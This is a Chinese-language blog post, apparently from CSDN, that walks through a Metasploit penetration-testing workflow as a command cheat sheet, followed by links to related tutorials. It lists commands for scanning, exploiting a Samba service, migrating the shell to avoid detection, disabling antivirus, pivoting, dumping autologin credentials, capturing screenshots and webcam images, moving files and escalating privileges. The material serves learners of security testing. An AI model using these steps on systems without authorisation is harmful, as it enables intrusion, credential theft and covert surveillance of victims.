Metasploit系列操作

最新推荐文章于 2024-05-16 13:00:24 发布
最新推荐文章于 2024-05-16 13:00:24 发布
阅读量190 收藏
点赞数 2
分类专栏: web安全渗透实战 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wutonghuayueye/article/details/107841254
版权

MSF渗透测试大致步骤:

1.扫描目标系统,寻找可用漏洞
2.选择并配置一个漏洞利用模块
3.选择并配置一个攻击载荷
4.选择一个编码技术,用来绕过杀毒软件
5.渗透攻击

1.使用辅助模块进行端口扫描

search portsacn
use  xxxxx
show options
设置必须的属性值(set PORTS 1-10000,....)

2.使用辅助模块进行服务 扫描

搜索扫描模块:search scanner
使用Nmap进行扫描:
绕过防火墙进行扫扫描主机系统
nmap -Pn -O 192.168.0.110

3.漏洞利用

通过观察打开的端口以及服务及版本搜索对应的漏洞利用模块(以samba服务为例)
search samba
对于漏洞利用列表,排前面的漏洞利用成功几率较高
查看漏洞利用信息:info exploit/xxxxx
使用该漏洞利用:use exploit/xxxxx
查看攻击载荷:show payloads
设置payload:set PAYLOAD cmd/unix/xxx
show options
设置必须属性(设置攻击机ip,被攻击机ip,端口...)
run

4.shell后利用

MSf发动攻击之后会获取目标主机的shell
  • 进程迁移,稳定shell:
在使用MSf获取的shell不够稳定,需要把它与目标系统的一个稳定进程绑定在一起,这样既不用对磁盘进行写入操作,也不容易被发现
查看目标系统的进程:ps
查看当前shell的进程号(984):getpid
将shell的进程迁移到稳定的进程中(448):migrate 448
再次查看当前shell进程(进程以及发生转移):getpid
(如果原进程984没有自动关闭使用自动迁移进程命令 run post/windows/manage/migrate)
  • 信息收集:
查看目标机系统信息: sysinfo/systeminfo 
检查目标是否运行在虚拟机:run post/windows/gather/checkvm
检查目标机是否在运行:idletime
查看路由信息:route
当要控制多个会话时候使用background命令把当前会话放到后台,getuid命令查找以及控制的机器
  • 后续操作
关闭目标杀毒软件: run post/windows/manage/killav
启动目标机的远程桌面协助(3389):
run post/windows/manage/ebable_rdp
查看目标机本地子网情况:
run post/windows/manage/autoroute
将meterpreter隐藏在后台,添加路由并进行查看
background
route add 192.168.172.0 255.255.255.0 1
route print

借助被攻陷的主机对其他网络进行攻击:
列举有多少用户登录了目标机器:
run post/windows/gather/enum_logged_on_users
列举目标机上安装了那些程序:
run post/windows/gather/enum_applications
  • 取证操作:
抓取自动登录用户账号密码:
run windows/gather/credentials/windows_autologin
若未抓取到,则使用Espia扩展插件;先输入load espia命令加载插件;
然后输入screengrab可以抓取目标机的屏幕截图,图片保存在root目录下
load espia
screengrab/screenshot

查看目标有没有摄像头,并打开拍照(保存在root目录下)
wencam_list
webcam_snap
摄像头监控:webcam_stream
访问:file://root/KzIDymVy.html
  • 文件系统命令:
查看目标机处于哪个目录: pwd/getwd(本地)
列出当前目录中的所有文件: ls
切换目录: cd c:\
pwd
搜索c盘中所有的.txt文件:
search -f *.txt -d c:\
下载目标机文件到本地:
download c:\test.txt /root
长传文件到目标机: 
upload /root/test.txt c:/
  • 后渗透攻击:权限提升
纵向提权:低权限用户到高权限用户
横向提权:同级别A角色的权限到B角色权限

进入目标机命令行: shell
查看目标权限: whoami /groups
  • 本地溢出提权:
查看以及获得的权限: getuid
尝试 getsystem 命令提权(一般会失败)
查看系统整体以及补丁情况:systeminfo
也可以用 Wmic 写出补丁情况:
Wmic qfe get Caption,Description,HotFixID,InstalledOn
对相应系统未打补丁情况寻找对于exp提权
background命令将会话放到后台,search 对应的exp利用设置好之后run
getuid查看是否提权成功
梧桐花月夜
关注
专栏目录
玩转Metasploit初级系列课程
08-15
Metasploit初级系列课程...在“玩转Metasploit初级系列课程”中,你将逐步掌握这个工具的精髓,从基础操作到高级技巧,从理论到实践,全面提升你的渗透测试能力。通过学习和实践,你将成为一个更加熟练的安全测试者。
Metasploit(超详细)命令
sGanYu
08-21 5899
Metasploit控制端接口命令 use [auxiliary(辅助模块)&exploit(攻击模块)&payload(攻击载荷)&encode(编译器模块)]:指定设置的模块 show [exploits&payloads&encoder&auxiliary&options]:显示可使用的模块或选项 set [options&payload]:设定选项或模块 run&exploit:启用模块 back:取消当前指定模块,
这是Metasploit常用命令。。。
Kali与编程
02-16 1038
12、banner:显示Metasploit的横幅信息。5、show:显示已设置的漏洞利用模块的参数或信息。13、quit或exit:退出Metasploit。7、exploit:使用漏洞利用模块攻击目标。8、sessions:显示所有当前活动的会话。1、help:显示所有可用命令的帮助信息。2、search:搜索可用的漏洞利用模块。3、use:选择要使用的漏洞利用模块。6、run:运行已设置的漏洞利用模块。4、set:设置漏洞利用模块的参数。11、route:设置或显示路由器。
Metasploit(最全命令讲解)
qq_62729556的博客
03-03 700
【代码】Metasploit(最全命令讲解)
metasploit常用命令
Johnathan的博客
03-03 578
metasploit常用命令 service apache2 start service postgresql start msfconsole启动 1.MSF终端命令 show exploit 列出metasploit框架中的所有渗透攻击模块。 show payloads 列出metasploit框架中的所有攻击载荷。 show auxiliary 列出metasploit框架中的所有辅助攻击模块。 search name 查找metasploit框架中的所有渗透攻击和其他模块。
Metasploit使用教程
Kali与编程
03-23 2054
例如,payload/windows/meterpreter/reverse_tcp是一个Windows系统的Meterpreter反向Shell Payload,可以建立与攻击机的反向连接并提供完全的系统访问权限。Payload模块是Metasploit中最重要的模块之一,它用于实现对目标系统的控制。Metasploit支持多种不同的操作系统(Windows、Linux、MacOS等)和硬件平台(x86、ARM等),并提供了多种编程接口,包括Ruby API、Python API、Java API等。
Metasploit渗透测试指南_渗透测试_metasploit_
10-04
成功渗透后,Metasploit提供了一系列后渗透工具,如Meterpreter,它是一个功能强大的远程控制外壳,支持多种操作,如文件操作、进程控制、键盘记录等。这些工具可以帮助测试者进一步探索目标系统,收集敏感信息,...
Mastering Metasploit 2nd Edition
05-14
- 本书由Nipun Jaswal编写,是Metasploit系列书籍的第二版。相较于第一版,新版在内容上进行了更新和扩充,更加贴近当前的信息安全环境和技术发展趋势。 - 作者通过本书分享了如何使用Metasploit进行高效的渗透测试...
metasploit 使用心得笔记
06-10
Metasploit的使用包含一系列的基本操作,如查看可利用漏洞、设置特定的exploit、配置攻击选项、执行攻击等。以console模式为例,用户可以输入命令查看帮助(如输入help或?)、列出exploit(如showexploits)、选择并...
Metasploit 基础知识
08-17
3. **Armitage**:这是一款基于图形界面的Metasploit前端工具,它通过可视化的方式展示了网络拓扑和攻击过程,非常适合初学者和需要直观操作界面的用户。 4. **Cobalt Strike**:虽然不是Metasploit的一部分,但...
Metasploit基本命令
最新发布
余十步的博客
05-16 534
(当前设置) ,也就是默认设置。开头的为测试模块,也就是。端口,不设置的话默认为。(需要) ,必须要设置的。如果不设置端口,默认为。,看看存不存在漏洞,
metasploit快速入门(一)安装部署
whatday的专栏
11-03 8771
目录 简介 1 在Windows上安装Metasploit 2在Linux和MacOS上安装Metasploit 3在Kali Linux上使用Metasploit 4升级Kali Linux 5构建渗透测试实验环境 6配置SSH连接 7使用SSH连接到Kali 8配置PostgreSQL数据库 9创建工作区 10使用数据库 11 使用 hosts 命令 ...
03 Metasploit渗透测试命令集合列表
程序猿的博客
07-03 209
Metasploit框架中最常使用的命令参考列表
Metasploit详细教程
Kali与编程
03-24 2227
Metasploit是一种功能强大的漏洞利用工具集,帮助用户测试网络安全并确认可能的漏洞。您可以从Metasploit官方网站下载适用于您操作系统的Metasploit框架。在成功启动Metasploit后,您需要查找目标设备并确定其IP地址、端口号和运行的服务。在选择漏洞后,您需要选择一个可用的模块以利用该漏洞。在选择了模块后,您需要设置所需的参数。该命令将扫描指定IP地址的所有开放端口,并识别运行的服务。该命令将列出所有与Apache相关的已知漏洞。该命令将显示所有可用选项,并允许您设置值。
渗透测试 ( 3 ) --- Metasploit Framework ( MSF )
freeking101的博客
07-02 9372
Metasploit专业版和精简版的主要差别在于专业版上面集成了全自动攻击模块,通过远程API集成网络分割测试模块、标准基线审计向导模块、闭环漏洞验证优先处理功能、动态载荷规避防病毒解决方案、钓鱼意识管理和鱼叉式网络钓鱼模块、对OWASP Top 10漏洞的Web应用程序测试模块、高级命令行和Web界面的选择模块。但是,专业版是必须要付费的,所以除非用到非个人的功能,否则没有必要去使用专业版,而且,专业版和精简版的渗透攻击模块是一样的。.........
metasploit后渗透之基础知识
Longwaer
01-31 2528
学习了解MSF后渗透小技巧,更好的在实战中对内部网络进行发现并横向。
Metasploit基础教程和简单使用
qq_41344881的博客
08-07 2097
一、工具概述#二、使用方法#三、常用命令#四、举例使用。
metasploit学习
m0_51418771的博客
12-22 654
杀毒软件和防火墙直接就给删掉了,我们只好很固执的告诉勤奋的防火前:我相信它,他不是病毒!攻击还是要考虑目标机的实际情况。我测试了我的虚拟机win10,而后测试了全家的手机,都没攻进去,大概是10版本太高。该漏洞是微软445端口的问题,SMB,被微软命名为2017的第十号漏洞。默认为HOME / [随机乱码名字] .wav。window:操作系统的版本,macos,linux等。-p :自动播放捕获的音频,默认为“true”-d :记录的秒数,默认为1秒。Set 必选项:RHOSTS。没有视频,可以录音哦。
Metasploit基本使用
qq_68233961的博客
11-05 776
Metasploit基本使用
Metasploit中文入门指南:渗透测试实战与智能安全分析
通过Metasploit,渗透测试可以被划分为一系列标准步骤,如创建项目、发现目标设备、获取访问权限、控制会话、证据收集、会话清理和最终生成详细的测试报告。 2. 安装和初始化设置:指南详细指导在Ubuntu Linux ...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值